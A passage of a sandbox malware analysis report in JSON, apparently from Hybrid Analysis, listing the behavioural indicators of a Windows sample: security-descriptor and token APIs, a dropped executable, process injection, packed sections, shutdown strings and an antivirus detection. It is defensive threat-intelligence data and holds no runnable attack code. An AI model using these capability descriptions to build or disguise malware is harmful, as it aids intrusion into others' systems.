\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetLengthSid\" (Indicator: \"GetLengthSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetSecurityDescriptorOwner\" (Indicator: \"SetSecurityDescriptorOwner\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetSecurityDescriptorSacl\" (Indicator: \"SetSecurityDescriptorSacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CopySid\" (Indicator: \"CopySid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSecurityDescriptorControl\" (Indicator: \"GetSecurityDescriptorControl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetAclInformation\" (Indicator: \"GetAclInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSidSubAuthority\" (Indicator: \"GetSidSubAuthority\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSecurityDescriptorGroup\" (Indicator: \"GetSecurityDescriptorGroup\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"MakeAbsoluteSD\" (Indicator: \"MakeAbsoluteSD\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSecurityDescriptorOwner\" (Indicator: \"GetSecurityDescriptorOwner\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"IsValidSid\" (Indicator: \"IsValidSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSecurityDescriptorDacl\" (Indicator: \"GetSecurityDescriptorDacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSecurityDescriptorSacl\" (Indicator: \"GetSecurityDescriptorSacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"InitializeSid\" (Indicator: \"InitializeSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"AddAce\" (Indicator: \"AddAce\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSidLengthRequired\" (Indicator: \"GetSidLengthRequired\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"IsValidSecurityDescriptor\" (Indicator: \"IsValidSecurityDescriptor\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"AddAce\" (Indicator: \"AddAce\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Temp\\EA3590E0-2749-49BE-B54E-3E5D2C546047\\DismHost.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00003284.00000000.72407.00150000.00000004.mdmp, 00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp, 00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \":\\Windows\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp, 00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \"C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp, 00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"C:\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"SM Driver Manager: PID=3284 Successfully opened driver package file 'C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf'. - CDriverManager::OpenPackageByFile\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"PID=3284 Successfully created a driver package instance for 'C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf'. - CDriverPackage::Initialize\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"PID=3284 Building driver collection for package 'C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf'. - CDriverPackage::CreateDriverCollection\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"SM Driver Manager: PID=3284 Building driver collection for package 'C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf'. - CDriverPackage::CreateDriverCollection\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"PID=3284 Successfully opened driver package file 'C:\\Windows\\System32\\DriverStore\\FileRepository\\vm3d.inf_x86_neutral_abfe51358467898f\\vm3d.inf'. - CDriverManager::OpenPackageByFile\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"s\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \"C:\\Windows\\System32\\DriverStore\\FileRepository\\pvscsi.inf_x86_neutral_2e237bca5c8036a7\\pvscsi.inf\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \"PID=3284 Successfully opened driver package file 'C:\\Windows\\System32\\DriverStore\\FileRepository\\pvscsi.inf_x86_neutral_2e237bca5c8036a7\\pvscsi.inf'. - CDriverManager::OpenPackageByFile\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \"PID=3284 Building driver collection for package 'C:\\Windows\\System32\\DriverStore\\FileRepository\\pvscsi.inf_x86_neutral_2e237bca5c8036a7\\pvscsi.inf'. - CDriverPackage::CreateDriverCollection\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003284.00000002.75400.00180000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"AddAccessAllowedAce\" which can \"Adds an access-allowed access control entry (ACE) to an access control list (ACL)\" [Source: gegdsimsogm.exe]\n Observed import api \"GetLengthSid\" which can \"Returns the length in bytes of a valid security identifier (SID)\" [Source: gegdsimsogm.exe]\n Observed import api \"GetTokenInformation\" which can \"Retrieves a specified type of information about an access token\" [Source: gegdsimsogm.exe]\n Observed import api \"InitializeAcl\" which can \"Initializes a new ACL structure\" [Source: gegdsimsogm.exe]\n Observed import api \"InitializeSecurityDescriptor\" which can \"Initializes a new security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorDacl\" which can \"Sets information in a discretionary access control list (DACL)\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorGroup\" which can \"Sets the primary group information of an absolute-format security descriptor replacing any primary group information already present in the security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorOwner\" which can \"Sets the owner information of an absolute-format security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorSacl\" which can \"Sets information in a system access control list (SACL)\" [Source: gegdsimsogm.exe]\n Observed import api \"AddAce\" which can \"Adds one or more access control entries (ACEs) to a specified access control list (ACL)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"CopySid\" which can \"Copies a security identifier (SID) to a buffer\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetAclInformation\" which can \"Retrieves information about an access control list (ACL)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetLengthSid\" which can \"Returns the length in bytes of a valid security identifier (SID)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSecurityDescriptorControl\" which can \"Retrieves a security descriptor control and revision information\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSecurityDescriptorDacl\" which can \"Retrieves a pointer to the discretionary access control list (DACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSecurityDescriptorGroup\" which can \"Retrieves the primary group information from a security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSecurityDescriptorOwner\" which can \"Retrieves the owner information from a security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSecurityDescriptorSacl\" which can \"Retrieves a pointer to the system access control list (SACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSidLengthRequired\" which can \"Returns the length, in bytes, of the buffer required to store a SID with a specified number of subauthorities\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"GetSidSubAuthority\" which can \"Returns a pointer to a specified subauthority in a security identifier (SID)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"InitializeAcl\" which can \"Initializes a new ACL structure\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"InitializeSecurityDescriptor\" which can \"Initializes a new security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"InitializeSid\" which can \"Initializes a security identifier (SID)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"IsValidSecurityDescriptor\" which can \"Determines whether the components of a security descriptor are valid\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"IsValidSid\" which can \"Validates a security identifier (SID) by verifying that the revision number is within a known range and that the number of subauthorities is less than the maximum\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"MakeAbsoluteSD\" which can \"Creates a security descriptor in absolute format by using a security descriptor in self-relative format as a template\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"SetSecurityDescriptorDacl\" which can \"Sets information in a discretionary access control list (DACL)\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"SetSecurityDescriptorGroup\" which can \"Sets the primary group information of an absolute-format security descriptor replacing any primary group information already present in the security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]\n Observed import api \"SetSecurityDescriptorOwner\" which can \"Sets the owner information of an absolute-format security descriptor\" [Source: DISMHOST.EXE.67A9C8A7.bin]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\n Observed string: \"shutdown -r\" (Indicator: \"shutdown \") in Source: 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\n Observed string: \"Shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00003552.00000000.74426.0042A000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeShutdownPrivilege\" (Indicator: \"SeShutdownPrivilege\"; Source: \"00000000-00003552.00000000.74426.002F0000.00000004.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLEA3ABB9921F0D41C8826609976DB6]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00003284.00000000.72407.00150000.00000004.mdmp, 00000000-00003284.00000001.74331.00150000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE77589621DFFB45D5B5037A034B96]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00003284.00000001.74331.00150000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"DISMHOST.EXE.67A9C8A7.bin\" claimed CRC 103114 while the actual is CRC 370977", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "CreateToolhelp32Snapshot\n GetSystemInfo\n GetFileAttributesA\n VirtualProtect\n GetVersionExA\n GetModuleFileNameA\n LoadLibraryA\n Process32Next\n Process32First\n UnhandledExceptionFilter\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n WriteFile\n GetStartupInfoA\n GetComputerNameA\n TerminateProcess\n Sleep\n CreateFileA\n GetTickCount\n VirtualAlloc\n ShellExecuteA\n SetSecurityDescriptorDacl\n ChangeServiceConfigA\n GetUserNameA\n GetDriveTypeA\n CopyFileA\n CreateThread\n GetSystemDirectoryA\n ExitThread\n GetFileSize\n CreateDirectoryA\n DeleteFileA\n FindFirstFileA\n FindNextFileA\n LockResource\n CreateProcessA\n FindResourceA\n GetWindowThreadProcessId\n GetCursorPos\n recv\n send\n accept\n sendto\n closesocket\n RegCloseKey\n RegOpenKeyExW\n OutputDebugStringW\n GetModuleFileNameW\n GetVersionExW\n OutputDebugStringA\n GetFileAttributesW\n GetCommandLineW\n LoadLibraryExW\n MapViewOfFile\n CreateFileMappingW\n GetSystemDirectoryW\n FindResourceExW\n GetModuleHandleW\n LoadLibraryW\n GetModuleHandleExW\n CreateFileW", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005872]\n \"DISMHOST.EXE.67A9C8A7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00005872]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-99647 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-128630819 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-128985227 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-129229779 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-129468201 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-129795625 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-130123168 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-130340992 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-130574798 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-130793012 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-131135947 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-131385350 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-131852880 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-132088090 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-132325030 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-132624664 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-132900664 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-133115597 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-133427757 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-133704564 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-133972499 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-134220772 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-134506470 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-134745227 [PID: 5872]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" queried SystemProcessInformation at 00000000-00005872-00000105-134995667 [PID: 5872]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" has section name .text with entropy \"6.06418869054\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" has section name .data with entropy \"7.99056036536\"\n \"gegdsimsogm.exe\" has section name .text with entropy \"6.58246664724\"\n \"gegdsimsogm.exe\" has section name .data with entropy \"7.739160394\"\n \"DISMHOST.EXE.67A9C8A7.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A9C8A7.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"PING\" (Indicator: \"ping\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\gegdsimsogm.exe\" has high entropy 7.25589233782372", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 712)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 712)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 712)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0
https://hybrid-analysis.com/sample/0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0
Hybrid Analysis - Killers
